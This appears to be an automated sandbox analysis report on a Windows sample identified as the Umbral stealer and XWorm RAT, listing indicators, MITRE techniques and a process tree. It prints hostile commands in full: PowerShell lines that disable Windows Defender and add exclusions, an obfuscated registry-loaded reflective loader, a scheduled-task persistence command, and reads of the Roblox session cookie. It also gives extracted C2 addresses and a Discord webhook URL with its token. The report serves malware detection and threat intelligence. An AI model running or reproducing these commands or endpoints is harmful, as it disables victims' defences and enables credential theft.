umbral | f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc

Analysis

max time kernel
150s
max time network
95s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
08-07-2024 17:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

rootkit.exe
Size

274KB
MD5

87119ce97d460721e8c6cb98f990c780
SHA1

eac69d7550546b7812eb5701e82e079ff780d93a
SHA256

f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc
SHA512

fce0177ad8df7622692919ff8493a9194b806774ca8508a4d28414d75e400bdf26b41818f12ad61a15a0860611d0d978d74660b970b9738c3d2b651e25290fcb
SSDEEP

6144:WZL665pSvWs4dNwLIdh+JR5d3fFbeT8UumB2p3H1s93LZG9B:WlKWtnvKR51fy8VZKTo

Score

10^/10

umbral xworm evasion execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

127.0.0.1:49403

quotes-suites.gl.at.ply:49403

quotes-suites.gl.at.ply.gg:49403

Mutex

25nhnSSJeo8OHnH7

Attributes

Install_directory
%AppData%
install_file
XClient.exe

aes.plain

Extracted

Family

umbral

https://discord.com/api/webhooks/1259895160632905769/Nt8uggl0mEBvysXT-BFIchzGoOqiC8hi2bWhb_ujCX5_THJiU5kiutfTRZpNtRkHK8Jq

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0034000000016f9f-15.dat	family_umbral
behavioral1/memory/2356-16-0x0000000000BC0000-0x0000000000C00000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0008000000012117-11.dat	family_xworm
behavioral1/memory/2904-12-0x0000000001340000-0x0000000001350000-memory.dmp	family_xworm

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection	svchost.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP	svchost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2256 created 432	2256	powershell.EXE	5

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2576	powershell.exe
2928	powershell.exe
1380	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Modify.exe

Executes dropped EXE 3 IoCs

pid	Process
2904	www.DeadSecObbbfuscation.exe
2356	Modify.exe
2324	www.DeadSec0000000000-obfusecator.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Software\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator = "C:\\ProgramData\\www.DeadSec0000000000-obfusecator.exe"	rootkit.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2256 set thread context of 1744	2256	powershell.EXE	47

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\appcompat\programs\RecentFileCache.bcf	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e0f6bb145fd1da01	powershell.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2992	schtasks.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2576	powershell.exe
2928	powershell.exe
1724	powershell.exe
2256	powershell.EXE
1064	powershell.exe
2256	powershell.EXE
1744	dllhost.exe
1744	dllhost.exe
1744	dllhost.exe
1744	dllhost.exe
1380	powershell.exe
2520	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1232	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	2904	www.DeadSecObbbfuscation.exe
Token: SeDebugPrivilege	2576	powershell.exe
Token: SeDebugPrivilege	2356	Modify.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeDebugPrivilege	2256	powershell.EXE
Token: SeDebugPrivilege	1064	powershell.exe
Token: SeDebugPrivilege	2256	powershell.EXE
Token: SeDebugPrivilege	1744	dllhost.exe
Token: SeDebugPrivilege	1380	powershell.exe
Token: SeDebugPrivilege	2520	powershell.exe
Token: SeDebugPrivilege	2972	taskmgr.exe
Token: SeAuditPrivilege	840	svchost.exe

Suspicious use of FindShellTrayWindow 13 IoCs

pid	Process
2972	taskmgr.exe
2972	taskmgr.exe
2972	taskmgr.exe
2972	taskmgr.exe
2972	taskmgr.exe
2972	taskmgr.exe
2972	taskmgr.exe
2972	taskmgr.exe
2972	taskmgr.exe
2972	taskmgr.exe
2972	taskmgr.exe
2972	taskmgr.exe
2972	taskmgr.exe

Suspicious use of SendNotifyMessage 13 IoCs

pid	Process
2972	taskmgr.exe
2972	taskmgr.exe
2972	taskmgr.exe
2972	taskmgr.exe
2972	taskmgr.exe
2972	taskmgr.exe
2972	taskmgr.exe
2972	taskmgr.exe
2972	taskmgr.exe
2972	taskmgr.exe
2972	taskmgr.exe
2972	taskmgr.exe
2972	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2700 wrote to memory of 2904	2700	rootkit.exe	30
PID 2700 wrote to memory of 2904	2700	rootkit.exe	30
PID 2700 wrote to memory of 2904	2700	rootkit.exe	30
PID 2700 wrote to memory of 2356	2700	rootkit.exe	31
PID 2700 wrote to memory of 2356	2700	rootkit.exe	31
PID 2700 wrote to memory of 2356	2700	rootkit.exe	31
PID 2700 wrote to memory of 2576	2700	rootkit.exe	32
PID 2700 wrote to memory of 2576	2700	rootkit.exe	32
PID 2700 wrote to memory of 2576	2700	rootkit.exe	32
PID 2700 wrote to memory of 2992	2700	rootkit.exe	34
PID 2700 wrote to memory of 2992	2700	rootkit.exe	34
PID 2700 wrote to memory of 2992	2700	rootkit.exe	34
PID 2356 wrote to memory of 2928	2356	Modify.exe	36
PID 2356 wrote to memory of 2928	2356	Modify.exe	36
PID 2356 wrote to memory of 2928	2356	Modify.exe	36
PID 2700 wrote to memory of 2324	2700	rootkit.exe	38
PID 2700 wrote to memory of 2324	2700	rootkit.exe	38
PID 2700 wrote to memory of 2324	2700	rootkit.exe	38
PID 2700 wrote to memory of 2324	2700	rootkit.exe	38
PID 2356 wrote to memory of 1724	2356	Modify.exe	40
PID 2356 wrote to memory of 1724	2356	Modify.exe	40
PID 2356 wrote to memory of 1724	2356	Modify.exe	40
PID 1696 wrote to memory of 2256	1696	taskeng.exe	42
PID 1696 wrote to memory of 2256	1696	taskeng.exe	42
PID 1696 wrote to memory of 2256	1696	taskeng.exe	42
PID 2356 wrote to memory of 1064	2356	Modify.exe	45
PID 2356 wrote to memory of 1064	2356	Modify.exe	45
PID 2356 wrote to memory of 1064	2356	Modify.exe	45
PID 2256 wrote to memory of 1744	2256	powershell.EXE	47
PID 2256 wrote to memory of 1744	2256	powershell.EXE	47
PID 2256 wrote to memory of 1744	2256	powershell.EXE	47
PID 2256 wrote to memory of 1744	2256	powershell.EXE	47
PID 2256 wrote to memory of 1744	2256	powershell.EXE	47
PID 2256 wrote to memory of 1744	2256	powershell.EXE	47
PID 2256 wrote to memory of 1744	2256	powershell.EXE	47
PID 2256 wrote to memory of 1744	2256	powershell.EXE	47
PID 2256 wrote to memory of 1744	2256	powershell.EXE	47
PID 2904 wrote to memory of 1380	2904	www.DeadSecObbbfuscation.exe	48
PID 2904 wrote to memory of 1380	2904	www.DeadSecObbbfuscation.exe	48
PID 2904 wrote to memory of 1380	2904	www.DeadSecObbbfuscation.exe	48
PID 1744 wrote to memory of 432	1744	dllhost.exe	5
PID 1744 wrote to memory of 476	1744	dllhost.exe	6
PID 1744 wrote to memory of 488	1744	dllhost.exe	7
PID 1744 wrote to memory of 496	1744	dllhost.exe	8
PID 2356 wrote to memory of 2520	2356	Modify.exe	50
PID 2356 wrote to memory of 2520	2356	Modify.exe	50
PID 2356 wrote to memory of 2520	2356	Modify.exe	50
PID 1744 wrote to memory of 604	1744	dllhost.exe	9
PID 1744 wrote to memory of 680	1744	dllhost.exe	10
PID 1744 wrote to memory of 752	1744	dllhost.exe	11
PID 1744 wrote to memory of 812	1744	dllhost.exe	12
PID 1744 wrote to memory of 840	1744	dllhost.exe	13
PID 1744 wrote to memory of 964	1744	dllhost.exe	15
PID 1744 wrote to memory of 108	1744	dllhost.exe	16
PID 1744 wrote to memory of 1016	1744	dllhost.exe	17
PID 1744 wrote to memory of 1036	1744	dllhost.exe	18
PID 1744 wrote to memory of 1108	1744	dllhost.exe	19
PID 1744 wrote to memory of 1172	1744	dllhost.exe	20
PID 1744 wrote to memory of 1232	1744	dllhost.exe	21
PID 1744 wrote to memory of 1288	1744	dllhost.exe	23
PID 1744 wrote to memory of 1628	1744	dllhost.exe	24
PID 1744 wrote to memory of 620	1744	dllhost.exe	25
PID 1744 wrote to memory of 2740	1744	dllhost.exe	26
PID 1744 wrote to memory of 2868	1744	dllhost.exe	27

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:432
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{d15b2779-7884-4cbb-a64a-f2b5142ac124}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1744

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:476
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:604
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:1288
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe
    3⤵
    PID:620
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
    3⤵
    PID:2056
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:680
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  - Modifies security service
  PID:752
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:812
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1172
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  PID:840
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {993F2002-18FA-436D-B11F-81CE7F5E0440} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](119)+'w'+'w'+''+[Char](115)+'t'+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2256
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:964
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:108
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:1016
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1036
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1108
- C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
  2⤵
  PID:1628
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:2740
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:2868

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:488

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:496

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:1232
- C:\Users\Admin\AppData\Local\Temp\rootkit.exe
  "C:\Users\Admin\AppData\Local\Temp\rootkit.exe"
  2⤵
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:2700
- - C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
    "C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2904
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1380
- - C:\Users\Admin\AppData\Local\Temp\Modify.exe
    "C:\Users\Admin\AppData\Local\Temp\Modify.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2356
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Modify.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2928
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1724
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2520
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2576
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2992
- - C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
    "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"
    3⤵
    - Executes dropped EXE
    PID:2324
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2972

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

Filesize
164KB

MD5
22d120454dd38d7f1a3f1cd0eb497f95

SHA1
4c11a082bf8e64b21310b959821a9f7324aa8107

SHA256
6fda5bd63e6647c70c7f420b4145898cada9e1a8bff4fca7f6a5859b648d217c

SHA512
1552101b7a22082eb69fe3485c53f595055bfc6db01ed14d4abc6f9cb9793e8ca3bc2f2448741fd8b4616f735c9f4f2e0299dc938d264103107fccbe68dc39a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Modify.exe

Filesize
229KB

MD5
9259d8aef8f52e8ff4fa082c0074c9b0

SHA1
88abb68a5632812be3c18e0c740e3818d9501b3e

SHA256
45d4033eeaa6aa420a644c3eb2d0ef659320c9a13e22d1d16930c807847203db

SHA512
9cb06d4026a53208e80865cdb21d79e40d418518a168680537cafa08f1c295094238014ba35c2b7794a773ac2dc480b01cf5811d5b1e60bf911d7a6d03985ede

Download Submit
C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

Filesize
42KB

MD5
737b2d60dc5d475685b65f5c288e00c0

SHA1
144ba7647d8609abe4aab74d4f191e2c594dd55a

SHA256
69c3458a319518d10939633f7421eb833c8c9c904f989f0ef75a572a59a1f084

SHA512
96a22774e1b5c22d9d4114a8f22f1f75cf2edc5970442e1b1e5eabfc70a922d3f4a5e5d8c93150f50ef3da45b241745f861f1d00b306c11707097495b84ecee6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
b0a17851316b39d3872d89ba00a56cfe

SHA1
cad7bb3fd0701a969451d979fd6325383ec0caf0

SHA256
e999f4104aae26d0f7bd9c088db3e36dc0413b554bdd39ac3ad2006f5cc50a1e

SHA512
54af72d60dcecf61889d51ec8b11d242b05ed0674dccc17234b058036ecdccd17483f24f51e98a5573fa86663137b1cb0372227687d42941da224fe328820d6d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
26ebfd1c75ffead44f160c4a5e73d96e

SHA1
8d0a378aefa87d4c2fd4a1ea24e553789be1f02d

SHA256
8e37b54f1de33de46256a947db93ddbcce64760b44f0ff73e2e73bd6aa4ad885

SHA512
2fc75e4180d55119ef3ff3301fd085b595975fb7b1ed579e50f3b024deff7fa2e6e191732995a837e88339d7e66eeaa48a5ab774c68ac4235fe065be85cd0bb3

Download Submit
memory/432-91-0x000007FEBDCF0000-0x000007FEBDD00000-memory.dmp

Filesize
64KB

Download
memory/432-84-0x00000000004C0000-0x00000000004EC000-memory.dmp

Filesize
176KB

Download
memory/432-73-0x0000000000490000-0x00000000004B6000-memory.dmp

Filesize
152KB

Download
memory/432-71-0x0000000000490000-0x00000000004B6000-memory.dmp

Filesize
152KB

Download
memory/432-92-0x0000000037B00000-0x0000000037B10000-memory.dmp

Filesize
64KB

Download
memory/432-74-0x00000000004C0000-0x00000000004EC000-memory.dmp

Filesize
176KB

Download
memory/432-90-0x00000000004C0000-0x00000000004EC000-memory.dmp

Filesize
176KB

Download
memory/476-106-0x0000000037B00000-0x0000000037B10000-memory.dmp

Filesize
64KB

Download
memory/476-105-0x000007FEBDCF0000-0x000007FEBDD00000-memory.dmp

Filesize
64KB

Download
memory/476-104-0x0000000000080000-0x00000000000AC000-memory.dmp

Filesize
176KB

Download
memory/476-98-0x0000000000080000-0x00000000000AC000-memory.dmp

Filesize
176KB

Download
memory/488-115-0x000007FEBDCF0000-0x000007FEBDD00000-memory.dmp

Filesize
64KB

Download
memory/488-116-0x0000000037B00000-0x0000000037B10000-memory.dmp

Filesize
64KB

Download
memory/488-114-0x00000000000E0000-0x000000000010C000-memory.dmp

Filesize
176KB

Download
memory/488-108-0x00000000000E0000-0x000000000010C000-memory.dmp

Filesize
176KB

Download
memory/496-122-0x00000000007D0000-0x00000000007FC000-memory.dmp

Filesize
176KB

Download
memory/1724-44-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

Filesize
32KB

Download
memory/1744-67-0x00000000778A0000-0x00000000779BF000-memory.dmp

Filesize
1.1MB

Download
memory/1744-63-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1744-60-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1744-68-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1744-65-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1744-61-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1744-62-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1744-66-0x0000000077AC0000-0x0000000077C69000-memory.dmp

Filesize
1.7MB

Download
memory/2256-59-0x00000000778A0000-0x00000000779BF000-memory.dmp

Filesize
1.1MB

Download
memory/2256-58-0x0000000077AC0000-0x0000000077C69000-memory.dmp

Filesize
1.7MB

Download
memory/2256-57-0x000000001A350000-0x000000001A37A000-memory.dmp

Filesize
168KB

Download
memory/2356-16-0x0000000000BC0000-0x0000000000C00000-memory.dmp

Filesize
256KB

Download
memory/2576-22-0x000000001B680000-0x000000001B962000-memory.dmp

Filesize
2.9MB

Download
memory/2576-23-0x0000000002890000-0x0000000002898000-memory.dmp

Filesize
32KB

Download
memory/2700-0-0x000007FEF6353000-0x000007FEF6354000-memory.dmp

Filesize
4KB

Download
memory/2700-1-0x0000000000120000-0x000000000016A000-memory.dmp

Filesize
296KB

Download
memory/2700-10-0x000007FEF6350000-0x000007FEF6D3C000-memory.dmp

Filesize
9.9MB

Download
memory/2700-35-0x000007FEF6350000-0x000007FEF6D3C000-memory.dmp

Filesize
9.9MB

Download
memory/2904-12-0x0000000001340000-0x0000000001350000-memory.dmp

Filesize
64KB

Download
memory/2904-17-0x000007FEF6350000-0x000007FEF6D3C000-memory.dmp

Filesize
9.9MB

Download
memory/2904-248-0x000007FEF6350000-0x000007FEF6D3C000-memory.dmp

Filesize
9.9MB

Download
memory/2928-36-0x000000001B700000-0x000000001B9E2000-memory.dmp

Filesize
2.9MB

Download
memory/2928-37-0x0000000002390000-0x0000000002398000-memory.dmp

Filesize
32KB

Download